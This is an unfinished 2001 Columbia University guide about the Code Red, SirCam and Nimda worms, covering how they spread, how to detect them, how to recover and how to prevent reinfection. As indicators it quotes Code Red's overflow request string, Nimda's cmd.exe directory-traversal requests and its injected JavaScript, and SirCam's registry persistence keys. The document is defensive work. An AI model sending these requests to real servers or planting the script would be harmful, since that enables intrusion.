Jeffrey Altman
The Kermit Project,
Academic Information Systems
Columbia University
jaltman@columbia.edu
October 23, 2001
© copyright by the Trustees of Columbia University in the City of New York.
The document to which this notice is attached is protected by copyright owned in whole or in principal part by The Trustees of Columbia University in the City of New York ("Columbia"). You may download the document for reference and research purposes only.COLUMBIA MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, WITH RESPECT TO THE DOCUMENT, OR ANY PART THEREOF, INCLUDING ANY WARRANTIES OF TITLE, NONINFRINGEMENT OF COPYRIGHT OR PATENT RIGHTS OF OTHERS, MERCHANTABILITY, OR FITNESS OR SUITABILITY FOR ANY PURPOSE.
Distribution and/or alteration by not-for-profit research or educational institutions for their local use is permitted as long as this notice is kept intact and attached to the document.
Any other distribution of copies of the document or any altered version thereof is expressly prohibited without prior written consent of Columbia.
For permission requests, licensing proposals, questions, or further information, please contact publications@columbia.edu.
This document borrows heavily from text included in CERT advisories. Especially in the descriptions of the viruses and worms. This is a work in progress. There are still significant amounts of work that need to be done on this document. Some sections are almost empty. It will be updated on a continuing basis until it is completed. Send questions and comments to the author.
[ Code Red ] [ SirCam ] [ Nimda ]
1. Introduction 1.1. What is a Virus? 1.2. What is a Worm? 2. How Modern Viruses and Worms Spread 2.1. Human Curiosity 2.2. Buffer Overflows 2.3. Design Flaws 2.4. Ease-of-Use Features 2.5. Embedded Scripts 2.6. File Sharing 2.7. Back Doors 3. What Viruses and Worms Can Do Once They Have Infected Your Computer 4. Current Virus/Worm Activity 4.1. Code Red Variants 4.2. W32/Sircam 4.3. W32/Nimda 5. Known vulnerabilities in Windows Operating Systems 6. How to Determine If You Are Infected 7. How to Recover If You Are Infected 7.1. Remove the Computer from the Network 7.2. Using a Virus-Specific Removal Tool 7.3. Using Norton Anti-virus to Clean the Computer 7.4. Backing Up Data Files 7.5. Reinstalling the Operating System 7.5.1. Using the Recovery CD 7.5.2. Installing the Operating System 7.6. Shutting Down Services (NT, 2000, XP) 7.7. Connecting to the Network 7.8. Applying Patches to the Operating System and Internet Explorer 7.8.1. Windows 2000 7.8.2. Windows NT 4 7.8.3. Windows ME 7.8.4. Windows 98 Second Edition 7.8.5. Windows 98 7.8.6. Windows 95 OSR2 7.8.7. Windows 95 7.9. Installing and Patching Microsoft Office 7.9.1. MS Office XP 7.9.2. MS Office 2000 7.9.3. MS Office 97 7.9,4. MS Office 95 7.10. Install Norton Anti-virus 7.11. Restoring Disabled Services (NT, 2000, XP) 7.12. Restore Backed Up Data 7.13. Install Other Applications 7.14. Additional Precautions 8. How to Prevent Reinfection 8.1. Subscribe to Mailing Lists for Notification of Vulnerabilities 8.2. Behavior Modification 8.2.1. Strong Passwords 8.2.2. Preventing Password Theft 8.2.3. Ignore Unexpected E-mail Attachments 8.2.4. Beware of the unexpected when browsing the web 8.3. System Tuning 8.3.1. Windows 95, 98, 98SE, ME 8.3.2. Windows NT, 2000, XP 8.3.2.1. Baseline Security Checklists 8.3.2.2. IIS Lockdown Tool 8.3.2.3. Hotfix Network Check 8.3.2.4. Microsoft Personal Security Advisor website 8.3.2.5 IIS URL Scan Tool 8.4. Web Sites to Monitor 8.4.1. Windows Updates 8.4.2. MS Office Updates 8.4.3. Microsoft Security 8.4.4. NTBugTraq 8.4.5. Symantec Security Response 8.4.6 Computer Emergency Response Team (CERT) 8.5. Establishing a Backup Procedure 8.6. Personal Firewalls 8.7. Configuring Norton Anti-virus to Protect Your Computer 8.7.1. Browsers and Downloads 8.7.2. File Scans 8.7.3. E-mail Scans 9. Alternatives to Microsoft Products 9.1. IIS 9.2. Internet Explorer 9.3. MS Outlook 9.4. MS Office 9.5. Windows 10. Further Reading 10.1. Books 10.1.1. Hacking 10.1.2. System Management 10.1.3. Security Policy
Over the last year the Internet has been hit by an ever increasing number of threats from viruses and worms. Not only have the number of threats increased but their sophistication has increased as well. Gone are the days when a virus received on a disk from a friend or even in an e-mail or newspost would limit its damage to the local machine. The latest breed of viruses is taking advantage of the 24/7 connectivity of computers at home, in the office, and even those with mobile links. Once infected the machine is used to further spread the virus or worm over the network.
Frequently, the virus or worm installs a backdoor to allow the computer to be further infiltrated at a later time. Machines that have been compromised in this manner can have all their data read or modified and the computer can be used in a coordinated denial of service attack against other hosts on the internet or worse. There can and probably will be deliberate attempts to destroy busineses, to compromise government security, to commit espionage, sabotage, and other kinds of crimes. The degree to which the economy and government depend on computers attached to public networks is the degree to which they are vulnerable.
This all sounds frightening and it is. But it is only the tip of the iceberg. What is not seen is the ever increasing cost in human hours spent trying to reduce the spread of these viruses/worms; the time spent rebuilding computer systems from scratch; and the time spent trying to guess what data might have been compromised and then ensuring that any data that might have been compromised is altered or otherwise secured.
Viruses and worms are spread in an ever-increasing number of ways limited only by the imagination of the authors. Each virus builds on the experiences of previous viruses to increase the rate at that they spread. Viruses and worms now often incorporate more than one of the following methods:
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+ | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | +---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+ ^ 0x40032492
A separate buffer is allocated for each logical value that is addressed by a computer program. The memory of the computer is therefore broken up into a series of buffers.
+-------+---+-----------------+-----+-------------------+----------+ | buf1 |b2 | buffer3 |buf4 | unallocated | buf5 | +-------+---+-----------------+-----+-------------------+----------+
A buffer overrun occurs when a computer program does not check the size of a buffer before writing into it and then writes more data into a buffer than will fit. When this occurs the extra data is written into the memory allocated to adjacent buffers. This overwrites the data stored in those buffers.
If someone knows that it is possible to force a program to overrun its buffers, and they can determine the purpose of the overrun buffers it is possible to cause the program to misbehave in well defined ways. This can be taken advantage of either to cause a service or application to crash; or under certain circumstances to cause the program to execute arbitrary commands on behalf of the attacker.
Buffer overrun attacks can occur against any type of computer application that accepts data from an external source. This includes all networked based services that accept connections such as web servers, file sharing services, remote procedure call services, and remote shell services. On the client side, potential victims are web browsers, e-mail clients, and any other application that processes data files.
When buffer overruns are used to cause services to crash and therefore become unavailable this is described as a "denial of service attack". When the overrun is used to allow a third party to execute arbitrary commands as the root or administrative user, the attack is referred to as a "root hack".
Perhaps replace Unicode example with another design flaw from Microsoft list. The argument against doing this is that this Unicode flaw was used by the W32/Nimda virus to attack IIS.
In recent months more sophisticated use of file sharing has been taking place. Virus writers are taking advantage of the ability to automate the establishment of new file share connections to attack new computer systems. This can be done either by querying the computer system for a list of related computer systems for that the current credentials may be accepted or by attempting random connections with the hope of finding a computer system with open file shares that are not protected with strong passwords. Once a file share has been established, the virus/worm attempts to install itself in locations that are likely to execute it. This can be performed by either replacing or modifying executable files. Other methods including copying curiously named programs or application data files that contain auto-executing script files in the hopes that the user's curiosity will cause him to open or execute the file as part of the process of determining the source of the file.
If appropriate access is given to the account used to mount the share it is even conceivable that the file share could be used to adjust system configuration information such as file and icon associations.
Back doors have become so common they are now a reasonable means of spreading additional worms. Since back doors may make use of standard computer system services they are not always detectable by the use of anti-virus programs. Nor are they closed automatically when vendor supplied patches to operating systems and applications are applied to the computer system.
The capabilities of viruses and worms are only limited by the creativity of the author and the privileges the virus is capable of acquiring on the infected computer system. Many PC based operating systems have no notion of user or process based privileges. On operating systems such as DOS, Windows 3.x, Windows 95/98/ME, OS/2 and MacOS, the virus is capable of performing any function that is installed on the computer. The virus can add, modify, delete or replace files; send e-mails; print documents; make phone calls; establish connections to other computers; capture passwords; read credit card information from electronic wallets; extract private keys used for authenticating to external hosts; and anything else the virus author can think of.
On operating systems that do provide user or process based privileges, such as Windows NT/2000/XP, Unix/Linux and MacOS X, the virus will have only those capabilities assigned to the process or user that was used to launch the virus in the first place. If the user or process has very limited capabilities on the computer, then the virus will have very limited capabilities for causing damage. It is for this reason that it is important that users of these operating systems do not login on a regular basis as the Administrator (or root) account. It is equally important that the accounts used to launch services such as web servers have the minimum capabilities necessary for providing its required functionality. Included in the list of capabilities are permissions to access the file systems of the local machine. Using the web server as an example, other than the files that the web server requires in order to run and the files it is serving to the web browsers there is no reason for a web browser to have access to any other files or devices on the machine. Therefore, the file system should be configured to deny access to all unnecessary files from the account used to start the web browser.
The vast majority of virus/worm activity in the last six months has been targeted against the operating systems and applications of Microsoft Corp. This is not to say that there have not been a significant number of vulnerabilities discovered in competing operating systems. However, Microsoft's products and users have been targeted due to their overwhelming majority of the marketplace and the huge number of known exploits that have been discovered and left unpatched on end-user systems. The following sections summarize the issues surrounding the most frequently seen viruses as of the current writing.
http://www.cert.org/advisories/CA-2001-13.html http://www.cert.org/advisories/CA-2001-19.html http://www.cert.org/advisories/CA-2001-23.html
Code Red (and Code Red II and Code Blue) are all variants of a worm that attempts to spread by taking advantage of a vulnerability in the Microsoft Internet Information Service (IIS). IIS is Microsoft's professional strength web server. The vulnerability is a Buffer Overrun in the Indexing Service DLL. Vulnerable platforms include:
Other devices including Cisco 600 DSL routers were adversely affected by the attacks even though they could not be infected.
CERT reports that the time to infect all vulnerable IIS servers given the rapid propogation of this worm is approximately 19 hours from the first infection. It should be noted that IIS is often running on desktop computers without the knowledge of the user. This can be the case either because IIS was installed in an active state by an OEM or during an upgrade; or because the user installed and activated all features during the installation of the operating system but did not realize the risks involved with running unmanaged services.
The Code Red worm attack proceeds as follows:
http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml
HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
Servers configured with a language that is not English and those infected with the later variant do not experience any change in the served content. Other worm activity on a compromised machine is time senstive; different activity occurs based on the date (day of the month) of the system clock:
The "Code Red" worm activity can be identified on a machine by the presence of the following string in a web server log files:
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
Different variants of the worm use different letters to replace the series of 'N's. The presence of this string in a log file does not neccessarily indicate compromise. Rather it only implies that a "Code Red" worm attempted to infect the machine.
A host running an active instance of the original "Code Red" worm scans random IP addresses on port 80/TCP looking for other hosts to infect.
The text of the "... Hacked by Chinese!" message is stored exclusively in memory and is not written to disk. Therefore, searching for the text of this page in the file system may not detect compromise. Since the worm resides entirely in memory a reboot of the machine purges it from the system. However, it is important to note that the vulnerability:
http://www.cert.org/advisories/CA-2001-13.html
allows arbitrary code to be executed in the Local System security context that gives the attacker complete control of the compromised server.
The only precondition for exploiting this vulnerability is that an IIS server is running with script mappings for Internet Data Administration (.ida) and Internet Data Query (.idq) files. The Indexing Services do not need to be running. As stated by Microsoft in MS01-033:
"The buffer overrun occurs before any indexing functionality is requested. As a result, even though idq.dll is a component of Index Server/Indexing Service, the service would not need to be running in order for an attacker to exploit the vulnerability. As long as the script mapping for .idq or .ida files were present, and the attacker were able to establish a web session, he could exploit the vulnerability."
The Code Red II variant is known to exploit this vulnerability to install a backdoor so that control of the machine may be regained after a reboot or application of a patch. It is reported that the presence of the back door is propogated to the hacker community via Internet Relay Chat (IRC).
Patches to the IIS vulnerability are available from Microsoft. Microsoft is also making available an IIS Lockdown tool to remove unused functionality and alter the privileges available to attackers.
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp http://www.microsoft.com/technet/security/bulletin/MS01-044.asp http://www.microsoft.com/technet/support/kb.asp?ID=Q300972 http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/locktool.asp
Microsoft has released a "Tool to Remove Obvious Effects of the Code Red II Worm"
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/redfix.asp
It should be noted that Microsoft states in the above link (case as quoted):
"THE TOOL ONLY ELIMINATES THE EFFECTS OF THE CODE RED II WORM. IT DOES NOT ELIMINATE THE EFFECT OF OTHER VARIANTS OF THE WORM. "IF THE WORM HAS INFECTED YOUR SYSTEM, YOUR SYSTEM HAS BEEN OPENED TO ADDITIONAL FORMS OF ATTACK. THIS TOOL ONLY ELIMINATES THE DIRECT EFFECTS OF THE WORM - IT DOES NOT ELIMINATE ANY ADDITIONAL DAMAGE THAT OTHER ATTACKS MAY HAVE CAUSED WHILE YOUR SERVER WAS INFECTED. "WHILE THIS TOOL IS USEFUL IN ELIMINATING THE EFFECTS OF THE CODE RED II WORM ON INTERNAL SERVERS THAT ARE PROTECTED FROM THE INTERNET BY A ROUTER OR FIREWALL, MICROSOFT RECOMMENDS THAT INFECTED INTERNET-FACING SERVERS BE REBUILT ACCORDING TO THE GUIDELINES PUBLISHED ON THE CERT WEB SITE. IN ADDITION, ANY OTHER SERVERS THAT ARE JUDGED TO HAVE BEEN PUT AT RISK BY THEIR PROXIMITY TO INFECTED SERVERS SHOULD ALSO BE REBUILT RATHER THAN BEING PLACED BACK INTO SERVICE. "
http://www.cert.org/advisories/CA-2001-22.html
W32/SirCam is a virus that spreads through e-mail and unprotected network shares. Once the virus has been executed on a system it may reveal or delete sensitive information. All Microsoft Windows operating systems are vulnerable. The SirCam virus can disable the auto-protect features of Anti-virus programs by modifying entries in the Windows registry. In order to detect the SirCam virus, the anti-virus programs must be used to perform a full scan of all drives.
The virus can appear in an email message written in either English or Spanish with a seemingly random subject line. All known versions of W32/Sircam use the following format in the body of the message:
Where [middle line] is one of the following:
Users who receive copies of the malicious code through electronic mail might recognize the sender. We strongly encourage users to avoid opening attachments received through electronic mail, regardless of the sender's name, without prior knowledge of the origin of the file or a valid digital signature.
The email message contain an attachment whose name matches the subject line and has a double file extension (e.g. subject.ZIP.BAT or subject.DOC.EXE). The CERT/CC has confirmed reports that the first extension may be .DOC, .XLS, or .ZIP. Anti-virus vendors have referred to additional extensions, including .GIF, .JPG, .JPEG, .MPEG, .MOV, .MPG, .PDF, .PNG, and .PS. The second extension is .EXE, .COM, .BAT, .PIF, or .LNK. The attached file contains both the malicious code and the contents of a file copied from an infected system.
When the attachment is opened, the copied file is extracted to both the %TEMP% folder (usually C:\WINDOWS\TEMP) and the Recycled folder on the affected system. The original file is then opened using the appropriate default viewer while the infection process continues in the background.
It is possible for the recipient to be tricked into opening this malicious attachment since the file appears without the .EXE, .BAT, .COM, .LNK, or .PIF extensions if the "Hide file extensions for known file types" is enabled in Windows. See IN-2000-07 for additional information on the exploitation of hidden file extensions.
W32/Sircam includes its own SMTP client capabilities, that it uses to propagate via email. It determines its recipient list by recursively searching for email addresses contained in all *.WAB (Windows Address Book) files in the %SYSTEM% folder. Additionally, it searches the folders referred to by the Registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
for files containing email addresses. All addresses found are stored in SC??.DLL or S??.DLL files hidden in the %SYSTEM% folder.
W32/Sircam first attempts to send messages using the default email settings for the current user. If the default settings are not present, it appears to use one of the following SMTP relays:
If W32/Sircam detects Windows networking shares with write access, it:
If the share contains a Windows folder, it also:
When installed on a victim machine, W32/Sircam installs a copy of itself in two hidden files:
Installing in Recycled may hide it from anti-virus software since some do not check this folder by default.
Based on external analyses, there is also a probability that W32/Sircam will copy itself to the %SYSTEM% folder as ScMx32.exe. In that case, another copy is created in the folder referred to by the Registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup
(the current user's personal startup folder). The copy created in that location is named Microsoft Internet Office.exe. When the affected user next logs in, this copy of W32/Sircam is started automatically.
The registry entry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Driver32
is set to %SYSTEM%\SCam32.exe so that W32/Sircam runs automatically at system startup.
The registry entry HKEY_CLASSES_ROOT\exefile\shell\open\command is set to:
"C:\Recycled\SirC32.exe" "%1" %*"
which causes W32/Sircam to execute whenever another executable is run.
A new registry entry, HKEY_LOCAL_MACHINE\Software\SirCam, is created to store data required by W32/Sircam during execution.
W32/Sircam searches for filenames with .DOC, .XLS, .ZIP extensions in the folders referred to by the Registry keys:
While the personal folder may vary with configuration, it is often set to:
\My Documents or \Windows\Profiles\%username%\Personal
A list of these files is stored in %SYSTEM%\scd.dll.
W32/Sircam attaches its own binary to selected files it finds and stores the combined file in the Recycled folder.
W32/Sircam can have a direct impact on both the computer that was infected as well as those with which it communicates over email:
The Nimda virus/worm is the worst that we have seen with regard to the rate of infection and network traffic generated by the attacks. This is due to the large number of vulnerabilities and attack paths used to spread the worm. This worm can affect all Microsoft Windows operating systems. The worm opens the machine to further attacks by using the built-in file sharing capabilities to open all drives on the machine to anonymous users.
The attack vectors can be summarized as follows:
Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload is automatically triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.
The email message delivering the Nimda worm appears to also have the following characteristics:
These files are passed through a simple pattern matcher that collects strings that look like email addresses. These addresses then receive a copy of the worm as a MIME-encoded email attachment. Nimda stores the time the last batch of emails were sent in the Windows registry, and every 10 days repeats the process of harvesting addresses and sending the worm via email.
Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:
The infected client machine attempts to transfer a copy of the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable. Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml). When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended to every one of these web-related files:
<script language="JavaScript"> window.open("readme.eml", null, "resizable=no,top=6000,left=6000") </script>
This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system.
In order to further expose the machine, the worm:
Furthermore, the Nimda worm infects existing binaries on the system by creating Trojan horse copies of legitimate applications. These Trojan horse versions of the applications first execute the Nimda code (further infecting the system and potentially propagating the worm), and then complete their intended function.
GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.
Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. In the case where a client is compromised, the worm is run with the same privileges as the user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites.
The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines.
The complete list of vulnerabilities for all Microsoft products can be found at the Microsoft TechNet web site:
http://www.microsoft.com/technet/security/current.asp
The best way to determine if you are infected is to install Norton Anti-Virus and scan all files (not just the executables) with an up to date set of virus definition files. Current virus definition updates can be downloaded from:
http://www.symantec.com/avcenter/download/pages/US-NNT.html
Other ways of finding out you are infected are:
In the cases of all viruses and worms that do not leave back doors on your computer it is perfectly fine to download a revised anti-virus definition for your machine and allow it to delete or (if possible) clean the affected files. Under some circumstances you may have to uninstall and reinstall some of your applications if required files have been tampered with.
Unfortunately, this is not acceptable when the attacking virus contains a known back door. When a back door is present on the machine it is not possible for the anti-virus definition author to know what to look for in order to clean or delete additional tools that have been installed on the machine via the backdoor. The additional tools may be installed during a subsequent attack unrelated to the initial infection. Under these circumstances we strongly urge that a complete reformat and reinstall of the machine take place. Otherwise, your privacy, the integrity of your data, and the security of the machines you connect to from this infected system may very well be at risk.
We realize that it is very likely that you do not want or are not able to throw out all of your data. To do so would the equivalent of burning down the house you grew up in. The closets and attics of your hard drive are most likely filled with documents, pictures, and other memorabilia that you do not want to destroy. Therefore it is important for you to clean your data to the best of your ability before backing it up; reinstalling your operating system and applications; and then restoring your data.
A summary of the recommended process is as follows:
This is likely to take several hours and requires several tools:
We understand that time can be more valuable than money. If we did not believe these steps were absolutely necessary to ensure the integrity of your data, preserve the safety of the network community, and ensure the security of the Columbia University computing environment we would not be insisting that they be performed.
It is unfortunate that the ownership and use of a personal computer is not as maintenance free as a camera, vcr or toaster. Instead a personal computer requires about as much attention as a 1950s automobile.
NOTE: These tools can only remove the obvious symptoms of the virus/worm. If the virus/worm installs a back door. The removal tool can close the back door but it cannot remove anything that was installed using the back door.
The following procedure can be used only if we can assume that the infected computer does not contain a virus that is able to disable or corrupt the anti-virus program.
Norton AntiVirus is a virus scanning program developed by Symantec Corporation. AcIS has purchased a site license for the Columbia University community. You can download it from:
http://www.columbia.edu/acis/software/nav/
or install it from the AcIS Internet Software CD-ROM. The AcIS Internet Software CD 8.0 for Fall 2001 is available for $10.00 in the following locations:
If you have not already installed the Anti-virus program you should purchase the AcIS CD (or borrow it from a friend.)
You should also download the latest Virus Definitions file using an uninfected computer. Three diskettes are required. The web address is:
http://www.symantec.com/avcenter/download/pages/US-NNT.html
When you purchase the Norton Anti-virus CD the program can be executed off the CD in the case the machine has been infected. Can this be done from the AcIS CD?can 102 Philosophy distribute diskettes with the latest virus definitions so that users do not have to connect to the network?
This section is flawed. I've been going through numerous scenarios in which the next virus has code to use the same hooks anti-virus programs use in order to prevent the installation or use of anti-virus programs. It does not actually need to uninstall the anti-virus program or destroy it, all it needs to do is corrupt the contents of the virus definition files (VDF). Since there are a relatively small number of VDF formats out there, this would be fairly easy to do. Once the VDFs become unreadable it would impossible to detect or disinfect the computer with the most common tools. In that case, the data must be removed onto removable media and disinfected on a previously uninfected computer.
This process takes care of any known viruses. However, it does not protect you against any additional hacker tools that were installed by a back door.
Once you have selected all the files to backup you can copy them to a floppy or other removal media. If you have a CD-R drive and appropriate software you can write them to a CD-R. If you have a tape drive, you can back them up to tape.
Remember, only data files can be backed up. When the data files have been backed up and verified you may want to take the added precaution of scanning the backup copies (when possible) with Norton Anti-virus on an uninfected machine.
Be sure to use a backup method that lets you restore selected files after re-installing the operating system.
Once the backup is complete you can go ahead and re-install the operating system.
There are two legal ways the operating system was installed on your computer:
Since you are installing an operating system from scratch you might want to consider upgrading your operating system to a newer version.
This section needs to be expanded to contain os specific details.
The directions for each operating system (Windows 95, 98, 98SE, ME, NT, 2000, XP) are slightly different. The general rules are that when installing the operating system you want to repartition and reformat the drives the operating system is going to be installed onto. If you are installing NT, 2000, or XP, you want to use the NTFS file system instead of FAT.
If you need to create installation diskettes from the CD media use the commands:
DOS : WINNT.EXE /OX 32-bit Windows: WINNT32.EXE /OX
During installation defer any questions about configuring the network or joining a domain. Do not install features you do not absolutely require. In particular, do not install Personal Web Server or Internet Information Service. If you are installing Windows 95/98/ME, do not install the File and Print Sharing services unless you require the ability to share your drives.
Insert instructions for turning off services on each OS version.
Restart Computer.
If you do not have a CD-ROM, you can use the Microsoft Windows Updates service.
http://windowsupdate.microsoft.com/
This service requires that Internet Explorer 5 or higher be used. If the version of IE that comes with the operating system is earlier than version 5 you must perform an IE update before you can continue. If your IE version is earlier than version 4, you must download the IE 5 (or higher) installer from a friend's computer (~550K) and execute it on your machine to perform the download and installation (~17MB). If you have version 4 you can download the installer from
http://www.microsoft.com/ie/
Once you have a version of IE installed that is 5.0 or higher you can start IE, select the Tools menu, and the Windows Update option. From the Windows Update home page select the PRODUCT UPDATES link. When a connection is established you are prompted with:
Windows Update Security Warning Do you want to install and run "Windows Update Control Package" signed on 5/4/01 7:49 PM and distributed by "Microsoft Corporation" Publisher authenticity verified by Microsoft Code Signing PCA.
You will now see a dialog box "Checking Available Updates..." This will be replaced by a screen listing all of the available updates for your combination of Operating System, Internet Explorer, and Hardware.
To avoid this warning each time you use Windows Updates add the web site windowsupdate.microsoft.com to your list of Trust Web Sites:
The list of updates is likely to be quite long and potentially confusing. The following is a list for each operating system of the updates that are to be installed and the order in which they are to be applied. The general rules are as follows:
NOTE: We strongly advise against using Microsoft Outlook or Outlook Express as your electronic mail client. However, if the version of Outlook Express is not updated to the current version, there is the chance that known vulnerabilities related to the reading of e-mail messages in Internet Explorer will not be patched.
**Versions of Windows Media Player (6.4 to 7.1) contain a buffer overflow error that can allow arbitrary code to be executed when Media Station (.NSC) files are executed. These files can be launched automatically from within a browser. Users must either apply the patch to version 6.4 or upgrade to version 7.1 and then apply the patch.
http://www.microsoft.com/technet/security/bulletin/MS01-042.asp
Patches sometimes take weeks or months to appear on the Windows Updates web site. All security patches for Windows 2000 can be downloaded from:
http://www.microsoft.com/technet/security/current.asp?productid=5&servicepackid=2
There are many patches that are not supplied as part of Service Pack 6a. Microsoft has stated they will not issue further service packs for NT 4.
http://www.microsoft.com/technet/security/current.asp?productid=1&servicepackid=7
There are no service packs available for Windows ME. From the Windows Update site you should install:
There is one security patch available at:
http://www.microsoft.com/technet/security/current.asp?productid=19&servicepackid=89
There are no service packs available for Windows 98SE. From the Windows Update site you can should install:
There is one security patch available at:
http://www.microsoft.com/technet/security/current.asp?productid=11&servicepackid=88
From the Windows Update site you can should install:
There are a large number of security patches available for Windows 98 that are not included in SP1.
http://www.microsoft.com/technet/security/current.asp?productid=10&servicepackid=52
http://www.microsoft.com/windows/ie/
In addition, Microsoft has stopped supporting Windows 95. The Windows Update site contains only a small subset of all of the patches that are available for Windows 95 platform. Other patches including Service Pack 1 and updated versions of the Windows TCP/IP stack (winsock) are only available from the Windows 95 Download site:
http://www.microsoft.com/windows95/downloads/default.asp
Patches that should be installed from the Windows 95 Download site include:
From the Windows Update site you can then install:
There are additional security patches available for all releases of Windows 95 not found on the previous two locations at:
http://www.microsoft.com/technet/security/current.asp?productid=9&servicepackid=50
If you have a CD-ROM with the appropriate patches, install them from the CD-ROM. Otherwise, use Internet Explorer to open
http://office.microsoft.com/productupdates
This web site is very similar to the Windows Update except instead of providing updates based upon the operating system version the MS Office version is tested instead. Like the Windows Update site you will need to accept an ActiveX control and you may want to add the office.microsoft.com hostname to the Trusted Sites list in the Internet Options.
The list of updates for each version of Microsoft Office follows.
Office XP has one Security Patch available.
http://www.microsoft.com/technet/security/current.asp?productid=116&servicepackid=0
With SP-2 installed, there are still several security patches to be installed.
http://www.microsoft.com/technet/security/current.asp?productid=42&servicepackid=11
The Windows Installer used by Office 2000 requires access to the original media. Here is Microsoft's explanation why it is required:
http://support.microsoft.com/support/kb/articles/Q255/4/99.ASP
http://www.microsoft.com/technet/security/current.asp?productid=70&servicepackid=29
There is one security patch to be installed on Office 95. Office 95 does not have the same types of vulnerabilities as later versions as it was not Internet aware.
http://www.microsoft.com/technet/security/current.asp?productid=69&servicepackid=0
If you are using Internet Information Service (IIS) be sure to run the IIS Lockdown Tool 8.3.2.2. (8.3.2.2).
As long as your computer is connected to outside sources of data it will not be possible to completely protect it from infection. Infections occur either because of a vulnerability in the operating system or applications that is actively attacked; or because a user unintentionally activates the virus during the course of their normal everyday activities. So what are the things we can do?
First, you can reduce the number of known vulnerabilities our computers are susceptible to:
Second, you must lower your trust level when interacting with information communicated to you by third parties. Security professionals will tell you that if you do not control the source of the communication you cannot be sure that it is safe. Virus authors attempt to use our trusting nature against us by using the accounts of our friends and family to send virus bearing e-mails or altering the web pages of trusted companies to convince us to download the virus to our machines. As the rate of incidents continues to increase we must respond with increased vigilance. We need to be conscious of our actions and how they may allow us to be taken advantage of. In other words, communicating over the web is not as safe as we would like it to be. In the same way that we must be careful of the things we say to someone that calls us on the phone saying they are from our bank, we must be careful of what we accept in e-mail or from web pages.
For those who are unaware, if someone calls you claiming they are from your bank or from any other company you have an on-going relationship do not give the caller:
All of this information is already known by your bank (or other company you are doing business with) and they have no reason to ask you for it. If there is a legitimate reason why they need this information the caller should ask you to call the phone number on the back of your credit card or on your monthly statement and speak with the appropriate representative. Only by initiating the call to a previously known phone number should you have a feeling of safety since you have no means of authenticating the caller is truly from your bank when you answer the call.
The goal of this service is to allow Microsoft to provide you with information that you can use to inform and protect yourself from malicious attacks. Microsoft's security team investigates issues reported directly to Microsoft, as well as issues discussed in certain popular security newsgroups. When they publish bulletins, they'll contain information on what the issue is, what products it affects (if any), how to protect yourself against, what Microsoft plans to do to fix the problem, and links to other sources of information on the issue.
This service supplements the security bulletins and other information located at Microsoft product security.
Microsoft digitally signs all security bulletins. To verify the signature, please download their PGP key from
http://www.microsoft.com/technet/security/MSRC.asc.
